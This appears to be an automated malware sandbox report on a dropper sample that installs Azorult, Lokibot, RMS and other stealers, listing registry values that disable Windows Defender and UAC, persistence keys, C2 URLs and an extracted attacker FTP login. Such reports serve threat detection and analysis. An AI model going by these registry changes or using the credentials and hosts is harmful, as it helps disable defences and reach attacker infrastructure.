azorult | af09248cb756488850f9e6f9a7a00149005bf47a9b2087b792ff6bd937297ffb

Resubmissions

15-04-2024 19:50

240415-ykmkcsef56 10

15-04-2024 19:28

240415-x6p2yaeb62 8

Analysis

max time kernel
2243s
max time network
2243s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
15-04-2024 19:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

advbattoexeconverter.exe
Size

804KB
MD5

83bb1b476c7143552853a2cf983c1142
SHA1

8ff8ed5c533d70a7d933ec45264dd700145acd8c
SHA256

af09248cb756488850f9e6f9a7a00149005bf47a9b2087b792ff6bd937297ffb
SHA512

6916c6c5addf43f56b9de217e1b640ab6f4d7e5a73cd33a7189f66c9b7f0b954c5aa635f92fcef5692ca0ca0c8767e97a678e90d545079b5e6d421555f5b761a
SSDEEP

24576:0xFkFHdJ8aT/iziXH6FGnYhqQuimKC6Qpor:0IdJ1KiBYhsl+r

Score

10^/10

azorult lokibot rms socks5systemz agilenet bootkit botnet collection discovery evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

socks5systemz

http://bpdstem.com/search/?q=67e28dd8385ba42a120baa1d7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c443db22f31dfe339426fa12a466c553adb719a9577e55b8603e983a608ffc13c1ee929d38

http://bpdstem.com/search/?q=67e28dd8385ba42a120baa1d7c27d78406abdd88be4b12eab517aa5c96bd86e894864e815a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be510b866db51b9e34eed4c2b14a82966836f23d7f210c7ee96983acc689115

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 1 IoCs

flow	pid	Process
968	652	rundll32.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5940	netsh.exe
5616	netsh.exe
4500	netsh.exe
1772	netsh.exe
3900	netsh.exe
5068	netsh.exe
5680	netsh.exe
1552	netsh.exe
5124	netsh.exe
1320	netsh.exe
4600	netsh.exe
4760	netsh.exe
5740	netsh.exe
5096	netsh.exe
896	netsh.exe
5004	netsh.exe
5656	netsh.exe
4884	netsh.exe
4664	netsh.exe
2428	netsh.exe
4168	netsh.exe
4424	netsh.exe
4968	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1852	attrib.exe
6044	attrib.exe
4828	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MnBDI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation	KtercHi.exe

Deletes itself 1 IoCs

pid	Process
2120	CCleaner64.exe

Executes dropped EXE 64 IoCs

pid	Process
4628	ccsetup622.exe
4896	CCleaner64.exe
1884	CCUpdate.exe
1552	CCUpdate.exe
2120	CCleaner64.exe
4628	CCleanerPerformanceOptimizerService.exe
1644	CCleaner64.exe
5792	AgentTesla.exe
6132	butterflyondesktop (1).exe
3676	butterflyondesktop (1).tmp
884	ButterflyOnDesktop.exe
4744	Azorult.exe
3216	wini.exe
4224	winit.exe
2056	rutserv.exe
5536	rutserv.exe
4884	rutserv.exe
1500	rutserv.exe
5548	rfusclient.exe
1272	rfusclient.exe
2928	Azorult.exe
6124	cheat.exe
5236	taskhost.exe
4580	P.exe
4828	ink.exe
2000	rfusclient.exe
2896	R8.exe
4076	Lokibot.exe
4540	winlog.exe
1532	winlogon.exe
5692	Rar.exe
2200	RDPWInst.exe
5724	taskhostw.exe
340	winlogon.exe
5180	Lokibot.exe
5160	RDPWInst.exe
432	Lokibot.exe
6140	taskhostw.exe
5008	Lokibot.exe
4868	Lokibot.exe
4640	Lokibot.exe
5628	Lokibot.exe
6140	Lokibot.exe
5812	Lokibot.exe
4956	Lokibot.exe
4732	taskhostw.exe
5728	SpySheriff.exe
4488	taskhostw.exe
5484	taskhostw.exe
3160	taskhostw.exe
3140	taskhostw.exe
1552	taskhostw.exe
3308	is-66TNR.tmp
3748	audioplayerjsplugin.exe
6068	2pS5wMzsgp7KIXlJSq.exe
3216	a3jiZHv4RuYAP2o6kdPT.exe
4584	is-KGL92.tmp
4496	threekingsoftvideo.exe
5916	threekingsoftvideo.exe
1600	KPeVsWkf.exe
1144	v925bE0.exe
1716	v925bE0.exe
2064	v925bE0.exe
5416	v925bE0.exe

Loads dropped DLL 64 IoCs

pid	Process
964	advbattoexeconverter.exe
964	advbattoexeconverter.exe
964	advbattoexeconverter.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
1552	CCUpdate.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
4628	CCleanerPerformanceOptimizerService.exe
1644	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
2120	CCleaner64.exe
1460	svchost.exe
3308	is-66TNR.tmp
3308	is-66TNR.tmp
3308	is-66TNR.tmp
6068	2pS5wMzsgp7KIXlJSq.exe
6068	2pS5wMzsgp7KIXlJSq.exe
6068	2pS5wMzsgp7KIXlJSq.exe
4584	is-KGL92.tmp
1144	v925bE0.exe
1716	v925bE0.exe
2064	v925bE0.exe
5416	v925bE0.exe
4636	v925bE0.exe
5016	WinProxy.exe
5016	WinProxy.exe
5244	assistant_installer.exe
5244	assistant_installer.exe
768	assistant_installer.exe
768	assistant_installer.exe
652	rundll32.exe
1016	setup.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
6028	Snetchball.exe
4952	Snetchball.exe
4952	Snetchball.exe
4792	Snetchball.exe
4792	Snetchball.exe
4668	Snetchball.exe
4668	Snetchball.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2312	icacls.exe
5212	icacls.exe
5952	icacls.exe
4488	icacls.exe
2120	icacls.exe
1040	icacls.exe
5680	icacls.exe
3388	icacls.exe
5100	icacls.exe
1716	icacls.exe
5740	icacls.exe
5292	icacls.exe
5376	icacls.exe
3596	icacls.exe
4856	icacls.exe
4540	icacls.exe
5260	icacls.exe
5324	icacls.exe
1544	icacls.exe
4144	icacls.exe
2864	icacls.exe
3860	icacls.exe
3700	icacls.exe
4868	icacls.exe
4992	icacls.exe
5472	icacls.exe
1768	icacls.exe
5864	icacls.exe
1648	icacls.exe
900	icacls.exe
3724	icacls.exe
5864	icacls.exe
2268	icacls.exe
5332	icacls.exe
2784	icacls.exe
2984	icacls.exe
3380	icacls.exe
4600	icacls.exe
4212	icacls.exe
4212	icacls.exe
4972	icacls.exe
5572	icacls.exe
808	icacls.exe
1096	icacls.exe
5356	icacls.exe
3136	icacls.exe
4424	icacls.exe
6028	icacls.exe
2484	icacls.exe
1928	icacls.exe
3420	icacls.exe
6120	icacls.exe
5312	icacls.exe
5748	icacls.exe
2312	icacls.exe
2420	icacls.exe
2068	icacls.exe
3856	icacls.exe
4728	icacls.exe
3856	icacls.exe
5844	icacls.exe
4064	icacls.exe

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/4076-4996-0x00000000027F0000-0x0000000002804000-memory.dmp	agile_net
behavioral1/memory/432-5252-0x0000000002DC0000-0x0000000002DD4000-memory.dmp	agile_net
behavioral1/memory/4868-5443-0x0000000001250000-0x0000000001264000-memory.dmp	agile_net
behavioral1/memory/5628-5448-0x0000000000EF0000-0x0000000000F04000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000002aaa5-5014.dat	upx
behavioral1/memory/1532-5021-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/1532-5054-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000200000002ab2a-5079.dat	upx
behavioral1/memory/340-5084-0x0000000000E30000-0x0000000000F1C000-memory.dmp	upx
behavioral1/memory/340-5086-0x0000000000E30000-0x0000000000F1C000-memory.dmp	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\CCleaner Smart Cleaning = "\"C:\\Program Files\\CCleaner\\CCleaner64.exe\" /MONITOR"	CCleaner64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop (1).tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe"	ButterflyOnDesktop.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe"	setup.exe

Checks for any installed AV software in registry 1 TTPs 24 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\Avira\Antivirus	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\Avira\Antivirus	CCleanerPerformanceOptimizerService.exe
Key opened	\REGISTRY\MACHINE\Software\AVAST Software\Avast	CCleanerPerformanceOptimizerService.exe
Key opened	\REGISTRY\MACHINE\Software\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\Speedup	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\avira\launcher\	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\AVAST Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\AVAST Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Speedup	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\Speedup	CCleaner64.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\SOFTWARE\Avira\AntiVirus	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Speedup	CCleaner64.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\AVAST Software\Avast	CCleanerPerformanceOptimizerService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	CCleaner64.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\SOFTWARE\Avira\AntiVirus	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\Software\WOW6432Node\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Avast Software\Avast	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	CCleaner64.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\avira\launcher\	CCleaner64.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json	KtercHi.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	KtercHi.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	KtercHi.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	v925bE0.exe
File opened (read-only)	\??\D:	v925bE0.exe
File opened (read-only)	\??\F:	v925bE0.exe
File opened (read-only)	\??\D:	v925bE0.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs

Web Service

T1102

flow	ioc
480	iplogger.org
542	raw.githubusercontent.com
960	pastebin.com
1213	api.keen.io
1215	api.keen.io
409	raw.githubusercontent.com
410	raw.githubusercontent.com
477	iplogger.org
1267	api.keen.io
1670	raw.githubusercontent.com
1669	raw.githubusercontent.com
478	raw.githubusercontent.com
483	raw.githubusercontent.com
536	camo.githubusercontent.com
477	raw.githubusercontent.com
1121	pastebin.com
1196	api.keen.io
1199	api.keen.io
490	raw.githubusercontent.com
626	pastebin.com
627	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
949	api6.my-ip.io
471	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe

Writes to the Master Boot Record (MBR) 1 TTPs 7 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	CCleaner64.exe
File opened for modification	\??\PhysicalDrive0	ccsetup622.exe
File opened for modification	\??\PhysicalDrive0	CCUpdate.exe
File opened for modification	\??\PhysicalDrive0	CCleaner64.exe
File opened for modification	\??\PhysicalDrive0	CCUpdate.exe
File opened for modification	\??\PhysicalDrive0	CCleaner64.exe
File opened for modification	\??\PhysicalDrive0	CCleanerPerformanceOptimizerService.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000300000002aa00-4707.dat	autoit_exe
behavioral1/files/0x000200000002aa42-4795.dat	autoit_exe
behavioral1/files/0x000300000002aa54-4891.dat	autoit_exe
behavioral1/memory/340-5086-0x0000000000E30000-0x0000000000F1C000-memory.dmp	autoit_exe

Checks system information in the registry 2 TTPs 4 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	CCleaner64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	CCleaner64.exe

Drops file in System32 directory 56 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\disk.inf_amd64_46a68184927df9e8\disk.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	CCleaner64.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	Process not Found
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_cc6edbde0940344f\keyboard.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\vhdmp.inf_amd64_1493e724f07f9b39\vhdmp.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\acpi.inf_amd64_1facf5c0b549e8ff\acpi.PNF	CCleaner64.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_726cea1f0f349cf7\machine.PNF	CCleaner64.exe
File created	C:\Windows\System32\DriverStore\FileRepository\pci.inf_amd64_429878ca49a21d99\pci.PNF	CCleaner64.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	HvMFTkC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudio.inf_amd64_e61357c1a331ecc4\hdaudio.PNF	CCleaner64.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\cpu.inf_amd64_4930e9ac235a7d97\cpu.PNF	CCleaner64.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	KtercHi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	KtercHi.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_702fdf2336d2162d\input.PNF	CCleaner64.exe
